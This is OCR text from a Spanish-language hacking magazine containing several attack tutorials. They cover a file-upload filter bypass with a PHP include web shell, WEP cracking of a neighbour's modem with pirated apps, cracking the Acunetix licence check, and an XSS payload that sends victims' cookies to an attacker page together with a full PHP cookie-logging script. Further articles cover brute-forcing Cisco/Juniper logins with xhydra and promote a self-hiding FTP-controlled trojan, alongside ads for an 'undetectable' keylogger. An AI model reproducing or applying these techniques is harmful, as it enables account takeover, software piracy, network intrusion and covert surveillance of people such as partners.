
}
}
?>

Cdigo:
<?php
$archivo =
$HTTP_POST_
FILES[archivo];
$nombre =
$archivo[name];
$exten =
strrchr($nombre,
.);
if ($ext ==
php or $ext ==
php5) {
echoNo
aceptamos ese tipo de
archivos;
}else{
if
(move_uploaded_
file($archivo[tmp_name],
$archivo[name])){
echo Archivo subido
correctamente a <a href=.$archivo
[name].>Archivo</a>;
}else{
echo Imposible subir archivo;

Si subirieamos un archivo con el nombre h4x0r1337.jpg.


php no dejaria ya que usa $extension = strrchr($nombre,
.); y ah nos negaria la extension. Subir un archivo
llamadoh4x0r1337php.jpg tampoco nos valdra ya que
.jpg no se ejecutaria en el servidor.La solucin esta en subir
un archivo llamadoh4x0r1337.php.... por ejemplo as
bypasseariamos el filtro y mishell.php.... podra ser ledo
como php en el servidor, veamos como hacerlo:

Primero con el live http headers capturamos la peticin


que manda nuestro navegador al subir un archivo
llamadoh4x0r1337.jpg:
Cdigo:
-----------------------------24464570528145\r\n
Content-Disposition: form-data; name=archivo;
filename=h4x0r1337.jpg\r\n
Content-Type: image/jpeg\r\n
\r\n
<? include($_GET[s]); ?>

bypassing de uploaders

if (!($ext != jpg)) {
echoNo aceptamos esa extension;
}else{
if (move_uploaded_file($archivo[tmp_name],
$archivo[name])){
echo Archivo subido correctamente <a href=.$arc
hivo[name].>Archivo</a>;
}else{
echo Imposible subir archivo;
}
}
?>
Ese es un ejemplo muy simple, ahi
bastara con subir un archivo con
nombre h4x0r1337.jpeg.php para
bypassear. Aqu pongo otro un
poco ms complicado:

Ahora le dariamos al boton que dice repetir y


modificariamos la peticion asi
Cdigo:
-----------------------------24464570528145\r\n
Content-Disposition: form-data; name=archivo;
filename=h4x0r1337.php....\r\n
Content-Type: image/jpeg\r\n
\r\n
<? include($_GET[s]); ?>

As
lo
gra
ria
mos
bypassear
el

uploader
Ojala sea de utilidad este pequeo tuto de como
Bypassear uploaders, Por motivos de trabajo me es
muy dificil encontrar tiempo libre para colaborar, pero
cuando me encuentro un espacio lo hago con mucho
gusto, saludos.
www.hackingmexico.mx

21

HackShop
Cursos Online
Diplomados
DVDs
Revistas
Hacking
Gadgets

USB PROFESSIONAL KEYLOGGER


(2MB Ghost Edition).
Vigilancia de computadoras profesional
Completamente indetectable por TODOS los antivirus, no es posible detectarlo por medio
de Software, ya que el sistema lo ve transparente como si fuera un teclado normal, no
requiere software de instalacion, ni drivers,
solo conectalo y listo.
Intercepta todas las teclas presionadas en
el teclado, averiguando passwords, conversaciones y mucho mas. Tiene memoria suficiente
para guardar conversaciones hasta 6 meses, 2
millones de teclas, 1000 paginas de texto.
No requiere pilas, se alimenta directamente de la energia de la PC
Simplemente conectalo atras de la computadora, y conecta el teclado al keylogger, y
automaticamente empezara a grabar todas las
teclas presionadas

RASPBERRY PI PENTESTER EDITION

WIFI CRACKER ROUTER

Ya puedes adquirir la Raspberry PI Pentester Edition atravez de HackingMexico, con la carcaza


oficial, ademas del Sistema Operativo para Pentesting de HackingMexico basado en Debian. Las
especificaciones son las siguientes
Specifications

Este router crackea las redes WEP y WPA automaticamente, no requiere de software extra, ni de una
computadora, solo conectalo y listo.

SoC:[7] Broadcom BCM2835 (CPU, GPU, DSP, SDRAM, and


single USB port)[3]
CPU: 700 MHz ARM1176JZF-S core (ARM11 family)[3]
GPU: Broadcom VideoCore IV,[73] OpenGL ES 2.0,
MPEG-2 and VC-1 (with license[70]), 1080p30
h.264/MPEG-4 AVC high-profile decoder and encoder[3]
Memory (SDRAM): 512 MB (shared with GPU) as of 15
October 2012
USB 2.0 ports:[14] 2 (via integrated USB hub)[65]
Video outputs:[7] Composite RCA (PAL and NTSC),
HDMI (rev 1.3 & 1.4),[74] raw LCD Panels via
DSI[75][76]14 HDMI resolutions from 640350 to
19201200 plus various PAL and NTSC standards.[77]
Audio outputs:[7] 3.5 mm jack, HDMI
Onboard storage:[14] SD / MMC / SDIO card slot
Onboard network:[7][14] 10/100 Ethernet (RJ45) via
USB hub[65]
Low-level peripherals: 8 GPIO, UART, IC
bus, SPI bus with two chip selects, +3.3 V, +5 V,
ground[73][78]
Power ratings: 700 mA (3.5 W)
Power source:[7] 5 volt via MicroUSB or GPIO header
Size: 85.60 mm 53.98 mm (3.370 in 2.125 in)[80]
Weight: 45 g (1.6 oz)[81]
Operating systems: HackingMexico OS

HACKINGMEXICO DVD 1
Ya puedes adquerir el primer DVD de HackingMexico que viene a tope con video tutoriales
paso a paso, mas de 50 herramientas de Hacking
compiladas en una interfaz grafica y la revista
en formato digital.
Contiene algunas herramientas desarrolladas por el staff de HackingMexico, otras son
Open Source

makuantosh

Haciendo

WarDriving
Con IPhone,
M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net

aludos bandita una vez mas


es un placer estar aka con
ustedes , hoy veremos como
hacer ese tan afamado hackeo
de redes wifi y obtener las claves weps
de los mdems de Telmex en Mexico.
Empezemos por definir que es
War Driving, segn la Wikipedia:
Se llama wardriving a la bsqueda
de redes inalmbricas Wi-Fi desde un
vehculo en movimiento. Implica usar
un coche o camioneta y un ordenador
equipado con Wi-Fi, como un porttil
o una PDA, para detectar las redes.
Esta actividad es parecida al uso de
un escner para radio.
El wardriving recibe su nombre
del wardialing (popularizado en la pelcula de Matthew Broderick Juegos
de guerra) porque tambin implica
buscar sistemas informticos.
Muchos practicantes usan dispositivos GPS para determinar la ubicacin de los hotspots hallados y registrarla en un sitio web (el ms popular
es WiGLE). Para mejorar el rango
de alcance, se construyen o compran
antenas, ya sean omnidireccionales o
altamente direccionales. El software
necesario se encuentra libremente en
Internet, notablemente NetStumbler
para Windows, KisMac para Macintosh y Kismet o SWScanner para
GNU/Linux.
El uso masivo de PDA y smartphones equipados con Wi-Fi facilitan
la prctica del wardriving, adems
existen versiones especiales de Kismet y NetStumbler para la plataforma
Pocket PC, inclusive existe software
como WiFiFoFum que conectando un
GPS pueden crear una imagen de Radar de las redes circundantes.
Una variante muy interesante y

24

www.hackingmexico.mx

Ipad, Ipod Touch

Obteniendo

Claves WEP
mas rpido ke con

Back Track de linux


recomendable es el Bus_Wardriving,
en la que aprovechando los trayectos
de autobs urbano buscamos redes
cmodamente reduciendo la emisin
de gases y los riesgos de conducir por
la ciudad. Esta modalidad plantea un
principal problema: la fuente de alimentacin est limitada a la propia
batera del Portatil o PDA.
Hay Programas para nuestros idevices con los cuales podemos actualmente obtener las contraseas wep de
los mdems y obtener acceso , explicare brevemente el funcionamiento de
cmo trabajan.
Analizando varias apps ke he probado solo hay 7 ke ocupo en mi iphone y en mi ipad , las he probado y su
nivel de porcentanje en el calculo de
las claves wep es de un 70% .

Hare un ejercicio con hackeando


una red pero analizando los siguientes
puntos de la infraestructura wifi:




Provedoor de Servicio
Fabricante y marca del modem
Direccion MAC
Tipo de Seguridad
Implementada (WEP,
WPA,WPSK) etc.
Canales de Acceso
No falta el pendejo ke diga no mames
, yo pa ke kiero saber eso ke pongan
como hacerlo , y siempre he dicho
algo si vas a hacer algo hazlo bien , no
nadamas es hackear algo por hacerlo
, hay ke saber hacer bien las cosas .
*Las Aplicaciones estar disponibles
en la Repo de m4ku4z.net .
*Antes que nada Debes Hacer hecho
el jailbreak en tu idevice. (si la banda pide un tuto para hacer el jailbreak
lo hare , a estas alturas debo asumir
que cualkiera de ustedes sabe hacer jailbreak , ya que considero que
hay demasiados tutos en google ,
pero si la banda lo rekiere pdanlo.
*Este Procedimiento lo he hecho en
Mexico y funciona , no he probado en
otros pases.

ma atakeremos:

2. Veamos ke tipo de modem es y


kien lo fabrica ^^

3. Ahora Crackeando la clave wep

para Infinitum9e8fb7 con iwep pro

makuantosh

1. Primero Analizemos a ke viciti-

Ahora tenemos la informacin que


necesitamos
Fabricante: Thompson Telecom
Belgium
Direccin MAC : 00:24:17:88:B0:91
Canal: 1 (trabajando sobre el canal 1
de envi recepcin)
Seguridad WIFI: WEP (en este caso
es apta para su hackeo)

*Como pueden ver la Victima SSID


es un Modem Infinitum de Telmex
con 6 digitos. (siempre contar
lo dgitos depues de la palabra
INFINITUMXXXXXX)

Como Podemos ver al hacer ahora el


scaneo con las herramienta iwep pro
vemos incluso otra infinitum de 4 digitos pero por ahora nos concentraremos en hackear la de 6 digitos.
Para esto la aplicacin trabaja con
diccionarios ke intentan decifrar la
clave a base de fuerza bruta y poder
adivinar la correcta.
Tambien podemos apreciar ke la
aplicacin nos ofrece una conccion
manual (por si ya tenemos la clave
pero nos da la opcin de explotar la
vulnerabilidad del modem .

www.hackingmexico.mx

25

makuantosh

4. Procedemos a explotar al vulnerabilida del sistema.

Como podemos ver tengo diccionarios


instalados ke contienen las claves a testear para lograr una conexin exitosa.
En total son 5 diccionarios hasta el
ao 2010 con claves , las cuales deben estar debidamente instaladas en el
dispositivo .

5. Obteniendo la Clave

6. Conectandonos al Modem

Como se puede ver tenemos 3 Claves


ke son candidatas a entrar y como
siempre a probar (como ya lo he hecho la clave exacta de ese modem es
la segunda opcin).

Como vemos hemos terminado hackeando la clave WEP de ese mode


ahora nos resta disfrutar de su conexin y si gustan navegar con ella.

26

www.hackingmexico.mx

Pero m4ku4z dijo


ke usaba 3 aplicaciones
no?, ahuevo falta una
esta es una mas sencilla
la cual nos da la clave
debido a que se conecta
a un servidor remoto y
la solicita .

SPEEDSSID

makuantosh

Reglas para usar esta otra


Aplicacin llamada
- Solo hackea claves weps con 6 digitos - Requiere conexin 3g/wifi para solicitar la clave -

Sacando la clave wep del ssid infinitum9e8fb7 con speedssid

Como podemos ver hemos obtenido la


clave , la cual es la segunda mostrada en
la aplicacin y listo.

Y bajen las apps , son de paga pfffffffffffff,


pero en mi repo estn crakeadas y son
gratis ;) asi ke a disfrutar kuleros!!!!

Dnde consigo las aplicaciones con las ke


el m4ku4z hackeo la wifi de su vecino?
Facil y sencillo valedores , una vez ke
tengan hecho el jailbreak agregen mi
repo bajo la siguiente direccin:

Bueno amigos por mi parte ha sido todo


sin antes agradecer su atencin durante el
tuto , espero le haya servido y utilizen al
mximo su idevice y le saken el provecho
y recuerden:

http://repo.m4ku4z.net/cydia

YO

SOY

M4KU4Z

EL

Y USTEDES

NO

www.hackingmexico.mx

27

crackeando acunetix

CRACKEANDO

ACUNET
Parte 1 de 3 / REVERSING / NIVEL: MEDIO-AVANZADO

Este tutorial es nicamente con fines educativos y no me hago


responsable por lo que se haga con su contenido.
Por Alejandro Torres (torrescrack)
e-mail: tora_248@hotmail.com
http://www.facebook.com/yo.torrescrack
www.torrescrack.blogspot.com

ste tutorial lo hice ya que no existe algn tute en la red


de como atacar este software, y adems de esto, resulta
que yo estaba buscando por la web algn escaneador
de vulnerabilidades web reciente y bueno, le en muchos sitios que este software acunetix es uno de los mejores
pero el problema es que yo quera probarlo y en la pagina tie-

28

www.hackingmexico.mx

nen solo una versin free que no escanea completamente como


debera y la otra versin completa tiene un costo, en la red hay
un crack o parche pero no me anime a bajarlo, asi que me puse
a darle un vistazo para obtener mi propia versin liberada y
demostrar que este software especializado en buscar vulnerabilidades web es muy vulnerable.

crackeando acunetix

TIX

V82012
EXPLORANDO AL ENEMIGO
Primero Instalamos y se me ocurri correr el software para
ver que tipo de proteccin o limitacin utilizaba , veamos.

Uhmm vemos que antes de iniciar el soft me pide datos


de la licencia para activar online y si no ingresas nada o algo
errneo no entras al soft , aparte de caro $$ ni siquiera te dejan
probar el software por unos das en su versin completa, vayamos a la carpeta donde
se instalo el software para ver que mas tiene.

Bien no tiene muchas cosas, pero hay se encuentra un


ejecutable llamado Activation.exe que al correrlo nos damos cuenta que es la misma pantalla que vimos anteriormente y el ejecutable principal es wvs.exe.
Bien, entonces ya sabemos que el programa
principal es wvs.exe entonces empezamos
por hay, ya que de alguna forma el programa
compara si esta registrado o licenciado y de
lo contrario carga el otro ejecutable para
iniciar con el registro o activacin.

www.hackingmexico.mx

29

crackeando acunetix

Vamos a examinarlo con un escaneador


en este caso el Protection ID para saber si el programa esta empacado y ver en
que esta compilado, veamos.

Bien no usa algn tipo de packer/protector, solo detecto un


posible deteccin de CD KEY o serial check, que en este
caso es lo segundo.
ABRAMOS NUESTRO DEBUGGER Y EMPECEMOS.
Al iniciar lo primero que se me ocurri con la info obtenida
anteriormente fue buscar en las strings el nombre del proceso que ejecuta, en este caso Activation.exe veamos lo que
encontramos.

Como veemos el software usa algn mtodo antidebug que


detecta si esta siendo debugeado o si hay algn parche, todava no sabemos como lo hace pero sigamos buscando mas
strings haber si hay otras llamadas y al rato regresamos en
caso de ser necesario, colocamos en el inicio de esa rutina un
BreakPoint con (f2) y sigamos..

30

www.hackingmexico.mx

Seguimos buscando y aqu tenemos algo interesante si ven


la imagen tenemos la zona mas sospechosa de todas pues
aqu vemos cuando decide si expira o no si esta activado o
no, vayamos a esa zona haber que vemos.

Como les decia mis sospechas eran ciertas pues el software utiliza esa direccion
de memoria en muchisimos otros lugares, posiblemente para hacer chequeos

crackeando acunetix

Que bien!!, si ven tenemos una


direccin de memoria que dentro de
ella se encuentra un buffer y compara el contenido de esa direccion con 0
y si el valor es diferente ya no llama al
activation.exe supongo que al haber licencia debe valer 1 el contenido del buffer.
En mi experiencia en diferentes software comerciales he visto este problema que utilizan
comparaciones en diferentes partes o ubicaciones
del programa hacia la misma direccin de memoria
para ver si el soft esta registrado, ellos piensan que es
un mtodo anti-cracking por si alguien se le ocurre parchear nicamente ese salto condicional, tambien en algn
momento debe meterle contenido a ese buffer, veamos si mis
sospechas son ciertas busquemos si alguien mas usa esa direccin
de memoria, hagamos click derecho y find references to: address
constant, veamos.

de la licencia, pongamos un Break Point


en todos ellos y ahora si ejecutemos el
Olly debugger y veamos en donde parara, veamos.

www.hackingmexico.mx

31

crackeando acunetix

Ok como vemos que hace unas comparaciones y de hay verifica si tu version


es valida para correr varias instacias en
el mismo pc , creo que la version mas
completa te permite hasta 10 instancias
corriendo, bien sigamos viendo donde
mas detiene la ejecucion y ver que otras
comparaciones hace.
Vemos que paro donde saca de la direccin de memoria 0xAE3E38, un buffer
y compara el contenido de ese buffer+4
si es igual a 0 y de caso contrario ya no
ejecuta la ventana activation.
Ahora bien ya tenemos el dato que en
esa direccin de memoria debe valer a
1, cambimosle el byte a 1.
Sigamos la ejecucin del software y
veamos en donde mas ocupa esa direccin de memoria, sigamos...
Vemos que compara el mismo buffer
+ 48 si es igual a 0 y de ser correcto esquiva el mensaje que nos diria
cuando caduca la licencia, en este
caso el buffer+48 vale 0 asi que no
nos preocupamos pero hay que tenerlo en cuenta, seguimos la ejecucion
haber que otra sorpresa nos tiene el
software.
En el prximo numero continuaremos
con este tutorial

32

www.hackingmexico.mx

hackeando correos

al vez la primera inquietud de muchos al iniciarse en el mundo del hacking, es Puedo hackear el
email de mi novia? La respuesta simple es SI,
pero sigue leyendo, no te emociones tanto.

Lo primero que debes entender es:


No todos los correos se pueden hackear
No es un proceso rapido que lleve 2 clicks
Los metodos que voy a describir, son los unicos que funcionan, en la red podras encontrar algunos falsos que solo
tratan de robar tu informacin.
XSS
Un verdadero hackeo de cuentas de Hotmail, Gmail, etc
significaria un error en la programacin de estas plataformas, el mas famoso y facil de explotar seria un XSS (Cross

Hac
C
Por M.C Raul
Robles Aviles
Megabyte

Site Scripting), pero este tipo de bugs aparecen una vez cada
ao bisiesto, y duran muy pocas horas activos.

La forma de explotarlo seria encontrar donde se pueda inyectar codigo en la pagina del correo, por ejemplo
http://facebook.com/app.php?><script language=
JavaScript>document.location=http://tupagina.com/
cookie.php?cookie= + document.cookie;document.
location=http://tupagina.com</script>

CODIGO DE COOKIE.PHP:
<?php
function GetIP()
{

if (getenv(HTTP_CLIENT_IP) && strcasecmp(getenv(HTTP_CLIENT_IP), unknown))

$ip = getenv(HTTP_CLIENT_IP);

else if (getenv(HTTP_X_FORWARDED_FOR) && strcasecmp(getenv(HTTP_X_FORWARDED_FOR), unknown))

$ip = getenv(HTTP_X_FORWARDED_FOR);

else if (getenv(REMOTE_ADDR) && strcasecmp(getenv(REMOTE_ADDR), unknown))

$ip = getenv(REMOTE_ADDR);

else if (isset($_SERVER[REMOTE_ADDR]) && $_SERVER[REMOTE_ADDR] && strcasecmp($_SERVER[REMOTE_ADDR],
unknown))

$ip = $_SERVER[REMOTE_ADDR];
else

$ip = unknown;
return($ip);
}
function logData()
{
$ipLog=log.txt;

$cookie = $_SERVER[QUERY_STRING];

$register_globals = (bool) ini_get(register_gobals);

if ($register_globals) $ip = getenv(REMOTE_ADDR);

else $ip = GetIP();






$rem_port = $_SERVER[REMOTE_PORT];
$user_agent = $_SERVER[HTTP_USER_AGENT];
$rqst_method = $_SERVER[METHOD];
$rem_host = $_SERVER[REMOTE_HOST];
$referer = $_SERVER[HTTP_REFERER];
$date=date (l dS of F Y h:i:s A);
$log=fopen($ipLog, a+);


if (preg_match(/\bhtm\b/i, $ipLog) || preg_match(/\bhtml\b/i, $ipLog))

fputs($log, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF:
$referer | DATE{ : } $date | COOKIE: $cookie <br>);
else

fputs($log, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF:
$referer | DATE: $date | COOKIE: $cookie \n\n);
fclose($log);
}
logData();
?>

34

www.hackingmexico.mx

hackeando correos

keando
orreos

mito
realidad
Una vez armado esto, hace que la victima abra tu pagina
donde este un iframe con el codigo que roba la cookie, una
vez teniendo la cookie, puedes utilizar plugins de Firefox
para editar la cookie y loguearte a la cuenta de la victima.

INGENIERIA SOCIAL
Este es el metodo mas comun y sencillo, consiste en enviarle
a la victima una pagina falsa que le pida su contrasea, por
ejemplo una postal de un admirador secreto, que al hacer
click pida usuario y contrasea para poder verla. La efectividad depende de que tanta experiencia tenga la victima con
este tipo de ataques.

FUERZA BRUTA
Hoy en dia es casi imposible realizar estos ataques debido a que
el sistema te banea despus de ciertos intentos, pero consiste
en utilizar un diccionario de palabras o de passwords comunes
para intentar entrar a la cuenta. Es un metodo lento, y tedioso,
puedes llevarte semanas y jamas dar con el password.
KEYLOGGERS
Esto requiere que le instales un software de keylogger a la victima, necesitarias enviarle un archivo y que ellos lo ejecuten,
tambien existen keyloggers de hardware donde se conecta el
teclado a este dispositivo que guarda todas las teclas, pero para
esto necesitas acceso fisico a la computadora de la victima
0DAYS
Estos son mas raros de encontrar, como en Gmail que permitia
resetear el password de cualquier usuario mediante la inyeccion
de un carcter de salto de linea, salvo que tu descubras un bug
de estos, o estes en el momento justo, y en el lugar indicado, es
posible que jamas veas activo un error de esta magnitud. Estos
son los mas efectivos ya que si permiten un hackeo casi instantaneo, pero son difciles de conseguir.
De ah en fuera cualquier otro metodo que veas en la red, es
seguramente un scam, no existe mayor ciencia, ni programas
magicos que hackean cuentas, por lo regular son troyanos y
malware. Antes de ir por tanto lio, preguntante si realmente
vale la pena pasar por todo eso, si tienes dudas de tu novia,
mejor cortala y ya. Recuerda que el busca encuentra.

www.hackingmexico.mx

35

identity and access management

Identity
andAccess
Management
SIMPLIFICA Y ASEGURA
Identity and Access Management
(IAM) certifica que las personas dentro de una organizacin tengan los
permisos y servicios que deban de
tener, no ms y no menos, para ejercer su labor, los cuales, la mayora de
las veces, se encuentran distribuidos
y hasta cierto punto duplicados entre
las aplicaciones de una organizacin
utiliza. Imaginen cuntas brechas de
seguridad se pueden encontrar en un
modelo de este estilo.
La solucin es utilizar esa misma informacin sobre los usuarios en todas
las aplicaciones. IAM unifica estas
identidades para manejarse de manera centralizada y as poder aplicar las
polticas y procedimientos desde un
punto. Esto simplifica la construccin
de solamente un punto de referencia
que funcione para todas las aplicaciones y asegura las identidades de los
usuarios consolidando la infraestructura de muchos a uno y reduciendo
las brechas de seguridad de un estado
abrumador a manejable.
CONSTRUYENDO UN IAM
El primer paso para construir un IAM
es identificar el flujo de datos en una organizacin sobre los usuarios y decidir
qu datos son relevantes de las entidades fuente (Recursos Humanos, Control
Escolar, etc.), consolidar y actualizar la
informacin de todas las identidades en
una sola identidad para todos los usuarios de una organizacin.

36

www.hackingmexico.mx

ADMINISTRACIN
DE ACCESOS
En un IAM el acceso a las aplicaciones puede estar definido por polticas
de negocio, polticas de seguridad y
requerimientos del usuario.
Debemos crear un mapeo en el cual
asociemos grupos de usuarios con controles de acceso, esto lo podemos lograr
construyendo roles y flujos de procesos
que se adecuen a las necesidades del
grupo de usuario que estamos clasificando. Posteriormente se mapean los
privilegios a los roles, se asignan roles
a los flujos y se asignan identidades a
los roles. Esta parte es la ms talachuda,
pero una vez que tengamos esto todo lo
dems ser pan comido.
ADMINISTRACIN
DE IDENTIDADES
Se requiere un mapeo de roles y reglas
a usuarios especficos que permitan el
acceso apropiado a los servicios. A su
vez, se requiere crear un proceso que
administre y lleve registro de accesos
a sistemas y datos, este proceso se
debe encargar del aprovisionamiento
de servicios a los usuarios definidos
por el rol que les corresponda; tambin se debe de establecer un flujo de
trabajo el cual define cmo se har
este aprovisionamiento y por ltimo
debe de considerarse que estos procesos puedan ser auditables.

A partir de aqu estaremos construyendo un modelo en base al single


sign-on, esto quiere decir que para
entrar a cualquier aplicacin solamente se requiere un id de usuario,
y la forma de autenticar, o sea, comprobar que es quin dice ser, deber
de ser compleja.

Por
Annika Pringles
@annikapringles

FUNCIONAMIENTO
DE UN IAM
Para el funcionamiento de un IAM
utilizar un ejemplo para mostrar
las partes que no pueden faltar en su
construccin:
1. El usuario se conecta a un servidor Web.
2. El servidor Web tiene un conector o agente que es prcticamente una interfaz hacia el
administrador de accesos, este
puede utilizar un plug-in o APIs
para su conexin.
3. El administrador de accesos es
un Punto de Aplicacin de Poltica por lo cual se debe contemplar que sea un sistema de alto
volumen y alta disponibilidad
ya que estar tomando decisiones para las solicitudes de acceso del servidor Web.
4. El administrador de identidades
es un Punto de Administracin
de Poltica que administra centralizadamente toda la informacin de las identidades desde
varias fuentes y es capaz de definir procesos y flujos que mantengan, administren y auditen
el acceso a los recursos.

FRAMEWORK DE UN IDENTITY MANAGEMENT


Para definir el framework de un IAM
debemos de considerar 4 partes:
El repositorio de servicios de directorio
es el componente ms crtico y es el
principal sistema en donde se almacena
toda la informacin del id de usuario y
la informacin del perfil asignado.
El aprovisionamiento proporciona un enfoque basado en roles para la administracin del ciclo de vida de un usuario.
La autenticacin apalanca los sistemas existentes incluyendo Active Directory, Enterprise Single Sign-On y
tokens RSA.
La administracin de accesos apalanca la infraestructura de administradores de accesos existentes.

identity and access management

Ayudando a la organizacin

Las ventajas y beneficios de un proceso de ingeniera de roles son:


Descubre cuentas, privilegios y
roles hurfanos.
Une roles traslapados.
Rompe los roles que estn
definidos abiertamente: mltiples
trabajos realizados por la misma
organizacin?
Define las limitaciones de un rol
que vienen de limitaciones de
permisos.
Crea herencia de roles: roles hijos
con bases comunes.
Limpia y coordina las definiciones
de grupos y privilegios.
Esencial para una administracin de
privilegios que ya est en marcha.
Ayuda a la documentacin y
cumple con las polticas.

RBAC
Una vez que llegamos a este punto podemos empezar a utilizar un modelo
que se llama RBAC (Role Based Access Control), el cual nos permite generar cubos de informacin sobre los
roles que estarn haciendo utilizados
para los accesos en las aplicaciones.
Utilizar RBAC soluciona el problema
de administracin de privilegios mejor
que DAC o MAC, pero el desarrollo de
herencia de roles es realizada manualmente y hay pocas herramientas que
nos pueden ayudar a realizarlo.

www.hackingmexico.mx

37

cisco/juniper

l sistema operativo de
Microsoft (Windows)
por ser el mas usado
es objeto de constantes
ataques, al igual los sistemas
operativos de equipos de
Redes mas usados como son
CISCO y JUNIPER, tambin
estn siendo objeto de testeo
para su vulneracin. Y como
tal estos tambin cuentan con
sus actualizaciones y/o parches
para corregir sus problemas de
seguridad.
Algunos ejemplos de seguridad
en equipos y/o software que
ofrecen las empresas CISCO y
JUNIPER son:
Equipos JUNIPER:

CISC

JUNI

Como observamos en la tabla de arriba, los dos ofrecen muchas posibilidades de seguridad informtica, no
podemos abarcar todos en este artculo as que nos enfocaremos en uno de
ellos. Hablaremos un poco de los IDP
(Intrusion Detection Prevention) y los
IPS (Intrusion Prevention System).

Equipos CISCO:

38

www.hackingmexico.mx

Estos equipos son muy buenos


realmente, el problema la mayora de
las veces esta en el admin de la red,
ya que regularmente siempre se dejan
con algunos puertos abiertos algunos
de ellos el admin los desconoce y
otros se deben de dejar abiertos para
la administracin del equipo remota-

IPER
mente, he aqu el problema, se dejan
comnmente abiertos los puertos 80,
443 y 22 que son respectivamente
http, https y SSH.
Pero si ya es un poco arriesgado
dejar puertos abiertos, imagnense
que para el colmo como me ha tocado
ver y administrar varios equipos de

seguridad donde dejan las contraseas


por default, se imaginan como cuales:
admin, root, 654321, qwerty y si tienes conocimientos previos a estos
equipos encontraras el tpico admin,
netscreen, cisco. He aqu el problema
no hace falta ser un hacker experto
para descifrar el admin y el pass, pero

cisco/juniper

CO/

Por
Ing. Manuel Dublan aka.
t3zc4

si acaso no es suficiente con esto, he


encontrado algunas casos en los que
nicamente el user pass es el nombre
de la empresa con el tpico vocales a
nmeros y algunas letras en Maysculas, ejemplo: T3lc3l, b4nc0, etc.

www.hackingmexico.mx

39

cisco/juniper

A Continuacin se mostrara
en un ejemplo de ataque de
diccionario para tener acceso
al equipo, ocuparemos BT 5
con sus tools xhydra (ataque de
diccionario o tambin conocido
como Brute force) y zenmap
(Escaneo de puertos), teniendo en
cuenta algunos aspectos descritos
anteriormente.
Lo primero es conocer la IP de
nuestra victima en este caso del
equipo y realizar un escaneo de
puertos, este se puede realizar con
nmap o zenmap.

Bru
for
2
Obtenidos que puertos se encuentran
abiertos creamos dos archivos de
texto sobre el escritorio de BT. Un
archivo es para el user y el otro para
los passwords.

40

www.hackingmexico.mx

En la pestaa Passwords podemos indicarle que intente


con un solo user y pass o utilizar los archivos de texto que
creamos en el escritorio de BT como se ve en la imagen, as
intentara con la lista que hayamos ingresado.

cisco/juniper

ute
rce

Abrimos uno de esos archivos para editarlo e


ingresamos en este caso todos aquellos posibles
passwords que creemos darn resultado.

Abrimos la tool xhydra de modo grafico solo


hay que abrir una Shell o terminal, tecleamos xhydra
automticamente se abrir la tool, en la pestaa target
indicaremos la IP del equipo y el puerto por donde queremos
intentar descifrar el user pass.

Por ultimo en la solapa Start le diremos que


de comienzo al ataque, si los archivos de texto
o diccionarios son muy grandes y el user pass
muy complejos tardara mucho pero si son por
default o no muy complejos no tardara mucho
en encontrarlos y nos dira valid password found.

www.hackingmexico.mx

41

nxt controler

NxtControler
troyano

Un

Paradivertirse

xt Controler es un virus de
tipo Troyano que recibe
comandos de un emisor remoto va Ftp, los cuales al
recibirse ejecutan una accin predeterminada, La lista de comandos consta de
comandos bsicos y divertidos, Cada
comando esta en corchetes, hasta ahora
la lista es algo corta pero seguiremos actualizando, ahora mismo trabajamos en
la manipulacin de archivos.

Cuando cree esta aplicacin, la cree


para que todo newbie pueda empezar
a manipular computadores remotos, as
que cree un panel de Creacin Llamado
NXT CONTROL MAKER, el cual
te permite personalizar tu propio Nxtcontroler para que lo puedas utilizar y
controlar otras pc. En este Articulo te
enseare a como personalizar tu NXTControler. La aplicacin de Creacin la
puedes encontrar en mi pagina web:

[END]-Termina la aplicacin
Remota
[SHUTDOWN]-Apaga el
computador
[RESTART]-Reinicia el
computador
[LOG-OFF]-Cierra sesin
[PSY]-Abre el video en youtube
de Oppa Gangnam style
[CD-OPEN]-Abre la bandeja de
CDs
[CD-CLSE]-Cierra La bandeja
de CDs
[CLEAR]-Limpia la ventana de
comandos
[MNTOR-OFF]-Apaga el
monitor
[HD-TSKBR]-Esconde la barra
de tareas
[SW-TSKBR]-Muestra la barra
de tareas
[BGRND-1]- Cambia el Fondo
por latin lover
[BGRND-2]-Cambia el fondo
Por una chica sexy
[Kill[Proceso]-Termina el
proceso escrito
[MSG[Mensaje]-Manda un
Messagebox con el mensaje
escrito
[UNINSTALL]-Elimina todo
rastro de el virus

http://nxthacks.webs.com/nxtcontrol
http://www.hackingmexico.mx/
nxthacks
http://neqprojects.webs.com/
nxtcontrol.htm
Esta es una aplicacin portable, y es
fcil de usar: (Figura 1)
Para crear nuestro NXT-Controler necesitamos un servidor FTP dedicado, yo
recomiendo usar la compaa 000webhost.com porque es gratis y fcil, debemos ingresar la informacin de nues-

(Figura 1)

42

www.hackingmexico.mx

Por
Fernando I. Nequis
tro servidor Ftp Y darle clic en Try, en
la barra inferior de status nos aparecer
Try Succesful si es que esta correcto,
si no aparece esto debemos checar que
todo est bien escrito, despus pasamos
a la parte derecha donde se encuentra un
cuadro de texto, en este cuadro de texto
debemos poner donde queremos que se
creen los archivos, en la parte inferior
esta una lista de los archivos que queremos crear, en la cual se encuentran:
Command List: Crea un archivo
de texto con la lista de todos los
comandos y sus usos.
Portable Exe: Es el virus Receptor Portable.
Instaler Exe: Es el virus Receptor instalable, solo lo debes ejecutar y automticamente se copia
en inicio para que inicie cada que
se prende el ordenador, se copia
con el nombre de Conexiones de
Red por seguridad.
Remote Controler: Es el programa emisor de Comandos.
Test Exe: Es el virus receptor,
pero este no se esconde y es portable lo cual te permite ver su correcto funcionamiento.

.TXT

EMISOR

RECEPTOR

(Figura 2)

Debemos Aceptar los trminos para


crear el archivo, y le damos en el
botn create, Se creara un archivo
DATA.dat este siempre debe estar
presente ya que este contiene las configuraciones de el servidor FTP.

nxt controler

.TXT

debemos teclear ENTER y para poder


escribir debemos de darle clic al cuadro de texto.

COMO FUNCIONA EL VIRUS?


En realidad es muy simple, pero todo
empieza en el Emisor, El emisor Sube
a el servidor FTP un comando en un archivo de texto, despus el receptor baja
ese archivo de texto y si en este existe
algn comando lo ejecuta. (Figura 2)
REMOTE CONTROLER
(EMISOR)
En la pantalla principal de el emisor
tenemos que insertar la informacin
de nuestro servidor, as podremos iniciar sesin y empezar a atacar.

Una vez iniciados Sesin podemos


empezar a enviar comandos, para esto
